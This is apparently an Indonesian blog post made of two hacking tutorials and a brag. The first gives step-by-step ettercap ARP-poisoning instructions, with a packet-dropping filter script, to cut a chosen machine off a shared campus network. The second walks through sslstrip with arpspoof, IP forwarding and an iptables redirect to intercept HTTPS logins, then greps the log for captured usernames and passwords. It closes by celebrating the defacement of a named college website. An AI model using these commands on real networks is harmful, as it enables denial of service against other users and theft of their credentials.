akhir2 ini gw lumayan dongkol dengan koneksi dikesekretariatan bersama dikampuz gw yang dimana jaringan internetnya dalam 1 jaringan.. awalnya kendalanya adalah client yang make hub dan sering ganti2 ip sementara sudah dapat jatah IP masing2. geram sih gw. tapi mau diapalah.. gw cuma bisa monitoring. untung gw make LINUX. hehe. lama kelamaan makin menjadi-jadi setelah keterangan dari wireshark menayangkan error yang sangat banyak, keterangan errornya adalah duplicate IP yang random. setiap hostname tersebut OL, pasti jaringan kacau. hostnamenya adalah “NUMPANK-OM”. ternyata komputer tersebut kena virus yang bikin kacau jaringan. inisiatif gw bagi tugas dengan temen gw aji. hehe, kayak FBI aja. dia ngecut koneksi dari IP yang bermasalah tersebut dan ngeflood balik. mau gak mau harus seperti itu, kalo nggak ya semua client pada kacau. tapi tetep gak kapok n kayaknya semua yang pake windus mulai terinfeksi.. (doh) payah ni sistem operasi satu nih. ya udah, gw coba cara yang menurut gw ampuh ini.. hehe. yaitu dengan metode ARP POISONING. gak usah dijelasin, langsung praktek aja yah. implementasinya begini :

(disarankan untuk memakai LINUX)
1. install ettercap
2. jalankan ettercap
3. pilih sniff -> unnified sniffing -> dan pilih interface yang terkoneksi tersebut.

Listening on eth1… (Ethernet)

eth1 -> 00:16:E6:DC:F1:DB 172.16.30.7 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

4. kemudian pilih host -> scan for host (tunggu sampai scanning selesai.

Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
30 hosts added to the hosts list…

5. kemudian pilih host -> host list
disitu ada list ip client yang sedang OL, contohnya salah satunya : 172.16.30.6 <- ini adalah IP victim yang akan kita putuskan koneksinya. klik di IP tersebut dan klik "add to target 1"

Host 172.16.30.6 added to TARGET1

6. kemudian buat file (terserah mau pake kate,gedit,atai apapun editor kesenangan anda) dan masukkan script ini :

if (ip.src == ’172.16.30.6′ || ip.dst == ’172.16.30.6′) {
drop();
kill();
msg(“Packet Dropped\n”);
}

nb : ip 172.16.30.6 disesuaikan dengan IP target anda
fite tersebut save ke dalam bentuk *.eft – ex: target.eft

7. convert file tersebut ke target.ef dan copy ke /usr/share/ettercap/
spyro@dhymaz-chua:~$ sudo etterfilter target.eft -o target.ef
spyro@dhymaz-chua:~$ sudo cp target.ef /usr/share/ettercap/

8. kembali ke ettercap, kemudiam pilih mitm -> arp poisoning -> centang “sniff remote connection” dan klik ok.

ARP poisoning victims:

GROUP 1 : 172.16.30.6 00:14:85:2D:50:3B

GROUP 2 : ANY (all the hosts in the list)

9. klik filters -> load a filter dan pilih file target.ef tadi yang telah dibuat.

GROUP 2 : ANY (all the hosts in the list)
Content filters loaded from /usr/share/ettercap/sekber.ef…

10. dan saya telah memastikannya, ngeping ke server lancar, ngeping ke internet lancar, ngeping ke ip victim lancar, tapi victim tidak akan bisa konek ke internet.

begitulah kurang lebih penjelasannya. selamat mencoba… (target yang saya serang dalam membuat artikelini menggunakan windows).
ettercap juga bisa dipakai untuk mematikan gateway. wow seremm.. haha.. masih banyak lagi yang bisa dilakukan oleh ettercap.. pinter2 explorasi aja yaa ^_^

regards : dhymaz_spyro

see this..

see this…

setelah jungkir balik kanan kiri guling-guling sampe gelas kopi pecah, akhirnya dapet suatu software yang yaa lumayan menurutku untuk menghack protocol https alias ssl hijacking. keterangannya silahkan baca disini atau disini dan juga disini dan masih banyak lagi…

nge-bacrit selesai.. langsung ke TKP :

1. semisal aja,
attacker : 172.192.30.30
victim : 172.192.30.40
gateway : 172.192.30.254

information : artikel ini menggunakan sistem operasi linux

2. command : sslstrip
manual options:
-w , –write= Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l , –listen= Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message

3 . execute :
root@spyro:~# sslstrip -a -w logfilename

4. execute arpspoof of the victim :
root@spyro:~# arpspoof -i vmnet1 -t 172.192.30.40 172.192.30.254

5. activate a ip_forward function :
root@spyro:~# echo 1 > /proc/sys/net/ipv4/ip_forward

6. redirect http port victim communication to sslstrip port
root@spyro:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 10000

nah, ketika victim melakukan login ke port https, maka username n passwordnya akan tercatat di log file dump yang kita buat (dalam artikel ini nama filenya “logfilename”)

7. view a dump log file :
root@spyro:~# cat logfilename | grep -i “passwd=”

lihat dan cari kata kunci “login=” dan “passwd=”
ex : login=dhymaz_spyro&passwd=djancuukkk

thankz to laharisi

untuk kedua kalinya pada pukul 15.10 http://amikom.ac.id dihack kembali by anaktk. lagi lagi buat pembelajaran ajalah buat amikom.. :p

sekolah tinggi sekelas amikom berhasil dihack… semoga ini menjadi pelajaran.. xixixixixixixi ^_^